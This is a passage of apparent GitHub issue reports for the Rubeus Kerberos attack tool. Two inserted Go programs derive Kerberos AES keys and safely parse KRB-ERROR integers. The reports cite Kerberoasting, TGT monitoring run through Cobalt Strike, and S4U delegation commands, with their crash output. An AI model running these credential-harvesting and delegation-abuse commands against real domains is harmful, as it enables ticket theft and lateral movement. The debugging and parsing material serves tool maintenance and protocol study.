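		fmt.Printf("%-11s salt=%q\n            aes256=%s\n", sam, salt, hex.EncodeToString(k))
	}
}
```

The computer-account line is the one to compare with the aes256-cts-hmac-sha1-96 value from the directory dump; the user-account line reproduces the salt Rubeus used in the output above. The RFC 3962 appendix B vectors ("password" with salt "ATHENA.MIT.EDUraeburn") exercise the same code path with a published answer.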

Unhandled Exception: Asn1.AsnException: integer overflow (positive)

Interesting issue ...

[*] Sending S4U2self request
[*] Connecting to 172.16.177.130:88
[*] Sent 1452 bytes
[*] Received 1432 bytes
[+] S4U2self success!
[*] Building S4U2proxy request for service: 'CIFS/WEB01'
[*] Sending S4U2proxy request
[*] Connecting to 172.16.177.130:88
[*] Sent 2487 bytes
[*] Received 120 bytes

Unhandled Exception: Asn1.AsnException: integer overflow (positive)
   at Asn1.AsnElt.GetInteger()
   at Rubeus.KRB_ERROR..ctor(AsnElt body)
   at Rubeus.S4U.Execute(KRB_CRED kirbi, String targetUser, String targetSPN, Boolean ptt, String domainController, String altService)
   at Rubeus.Commands.S4u.Execute(Dictionary`2 arguments)
   at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Rubeus.Program.Main(String[] args)
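This crash and the System.OverflowException report earlier on the page both die inside the Rubeus.KRB_ERROR constructor while turning an ASN.1 INTEGER from the KDC's short error reply into a 32-bit value. The Go program below is an added example, not Rubeus code: a small DER reader that decodes INTEGER fields of any width into math/big values, extracts error-code from a KRB-ERROR, and flags a value outside the Int32 range as a protocol anomaly instead of throwing. buildKrbError is a constructed helper that produces a minimal message carrying only pvno, msg-type and error-code (a real KRB-ERROR also carries stime, susec, realm and sname), so the program runs offline; the tag layout follows RFC 4120 section 5.9.1.

```go
package main

import (
	"errors"
	"fmt"
	"math"
	"math/big"
)

// tlv is one decoded DER element: class 0=universal, 1=application, 2=context.
type tlv struct {
	class   byte
	tag     int
	content []byte
}

// readTLV decodes the DER element at the start of b and returns it with the rest
// of b (single-byte tags and definite lengths up to 4 bytes cover KRB-ERROR).
func readTLV(b []byte) (tlv, []byte, error) {
	if len(b) < 2 || b[0]&0x1f == 0x1f {
		return tlv{}, nil, errors.New("short element or multi-byte tag")
	}
	t := tlv{class: b[0] >> 6, tag: int(b[0] & 0x1f)}
	n, i := int(b[1]), 2
	if n&0x80 != 0 { // long form: the next k bytes hold the length
		k := n & 0x7f
		if k == 0 || k > 4 || len(b) < 2+k {
			return tlv{}, nil, errors.New("bad length encoding")
		}
		n = 0
		for _, c := range b[2 : 2+k] {
			n = n<<8 | int(c)
		}
		i += k
	}
	if len(b) < i+n {
		return tlv{}, nil, errors.New("truncated element")
	}
	t.content = b[i : i+n]
	return t, b[i+n:], nil
}

// derInteger decodes a DER INTEGER of any width as a two's-complement big.Int,
// so a value outside int32/uint32 reaches the caller instead of overflowing.
func derInteger(content []byte) (*big.Int, error) {
	if len(content) == 0 {
		return nil, errors.New("empty INTEGER")
	}
	v := new(big.Int).SetBytes(content)
	if content[0]&0x80 != 0 { // sign bit set: subtract 2^(8*len)
		v.Sub(v, new(big.Int).Lsh(big.NewInt(1), uint(8*len(content))))
	}
	return v, nil
}

// krbErrorCode extracts error-code ([6] INTEGER) from a KRB-ERROR, which is
// APPLICATION 30 wrapping a SEQUENCE of context-tagged fields (RFC 4120 5.9.1).
func krbErrorCode(msg []byte) (*big.Int, error) {
	app, _, err := readTLV(msg)
	if err != nil || app.class != 1 || app.tag != 30 {
		return nil, errors.New("not a KRB-ERROR (expected APPLICATION 30)")
	}
	seq, _, err := readTLV(app.content)
	if err != nil || seq.class != 0 || seq.tag != 16 {
		return nil, errors.New("KRB-ERROR body is not a SEQUENCE")
	}
	for rest := seq.content; len(rest) > 0; {
		var f tlv
		if f, rest, err = readTLV(rest); err != nil {
			return nil, err
		}
		if f.class != 2 || f.tag != 6 {
			continue // pvno, msg-type, stime, ... are not error-code
		}
		inner, _, err := readTLV(f.content)
		if err != nil || inner.class != 0 || inner.tag != 2 {
			return nil, errors.New("error-code is not an INTEGER")
		}
		return derInteger(inner.content)
	}
	return nil, errors.New("no error-code field present")
}

var errorNames = map[int64]string{7: "KDC_ERR_S_PRINCIPAL_UNKNOWN", 23: "KDC_ERR_KEY_EXPIRED", 62: "KDC_ERR_CLIENT_NOT_TRUSTED"}

// errorName names the codes seen on this page; error-code is an Int32 in
// RFC 4120, so anything wider is reported as an anomaly rather than wrapped.
func errorName(code *big.Int) string {
	if !code.IsInt64() || code.Int64() > math.MaxInt32 || code.Int64() < math.MinInt32 {
		return "out-of-range"
	}
	if name, ok := errorNames[code.Int64()]; ok {
		return name
	}
	return "unknown"
}

// buildKrbError constructs a minimal sample KRB-ERROR with only pvno, msg-type
// and error-code (given as DER integer content bytes) for offline testing.
func buildKrbError(errorCode []byte) []byte {
	wrap := func(tag byte, body []byte) []byte { return append([]byte{tag, byte(len(body))}, body...) }
	ctx := func(n byte, body []byte) []byte { return wrap(0xa0|n, body) }
	fields := append(ctx(0, wrap(0x02, []byte{5})), ctx(1, wrap(0x02, []byte{30}))...)
	fields = append(fields, ctx(6, wrap(0x02, errorCode))...)
	return wrap(0x7e, wrap(0x30, fields)) // 0x7e = constructed APPLICATION 30
}

func main() {
	code, err := krbErrorCode(buildKrbError([]byte{0x00, 0xff, 0xff, 0xff, 0xff}))
	fmt.Println(code, errorName(code), err)
}
```

A client that wants the Rubeus behaviour of a typed error code can still call IsInt64 and range-check before converting; the point is that the parse itself never fails on a wide value, so the rest of the KRB-ERROR (e-text, e-data) remains available for diagnosis.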

Option to save ticket in a file

It would be a great help to have an option in the asktgt/tgs commands to store the ticket directly in a file ;), instead of having to use the PowerShell [IO.File]::WriteAllBytes, which is a little cumbersome.

[!] Unhandled Rubeus exception:

Good day.
Trying to run Rubeus monitor. On all systems (Win10 and Win7) the same issue. Tried as local Admin, Domain Admin, User... Same. Tried disabling UAC.

PS C:\> .\Rubeus.exe monitor

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: TGT Monitoring
[*] Monitoring every 60 seconds for new TGTs


[!] Unhandled Rubeus exception:

System.Exception: Could not elevate to system
   в Rubeus.LSA.GetLsaHandle()
   в Rubeus.LSA.EnumerateTickets(Boolean extractTicketData, LUID targetLuid, String targetService, String targetUser, String targetServer, Boolean includeComputerAccounts, Boolean silent)
   в Rubeus.Harvest.HarvestTicketGrantingTickets()
   в Rubeus.Commands.Monitor.Execute(Dictionary`2 arguments)
   в Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   в Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)
PS C:\>

Type conversion error when running MONITOR command

When running the monitor command with the following parameters in Cobalt Strike:

execute-assembly /tmp/rubeus.exe monitor /interval: 5

The monitoring function works (as determined by the tool outputting the various 4624 events that are occurring), but instead of dumping the TGT information along with the hash, we get the following error:

[x] Value was either too large or too small for a UInt32

I took a look through the associated code for Harvest and noted that the luid value was being converted to a UInt32. Without knowing why this could be an issue, I changed instances of uint32 to uint64 for Monitor as well as the associated Harvest functions, recompiled, and I got no more errors! I haven't submitted a PR because, well, I'm not sure if what I did is fixing the root-cause error or if I am just bumbling around.

Also... my "fix" rendered the tool able to print out some information that it previously did not (Target luid and Target service), but it returns that it was able to extract 0 tickets. I'm not sure if this is related to my "fix" or some other thing.

Unhandled Rubeus exception

I'm executing:
Rubeus.exe kerberoast /rc4opsec

After a lot of tickets are retrieved I'm getting the following exception:

System.NullReferenceException: Object reference not set to an instance of an object.
   at Rubeus.Roast.Kerberoast(String spn, String userName, String OUName, String domain, String dc, NetworkCredential cred, String outFile, Boolean simpleOutput, KRB_CRED TGT, Boolean useTGTdeleg, String supportedEType, String pwdSetAfter, String pwdSetBefore, String ldapFilter, Int32 resultLimit, Boolean userStats)
   at Rubeus.Commands.Kerberoast.Execute(Dictionary`2 arguments)
   at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)
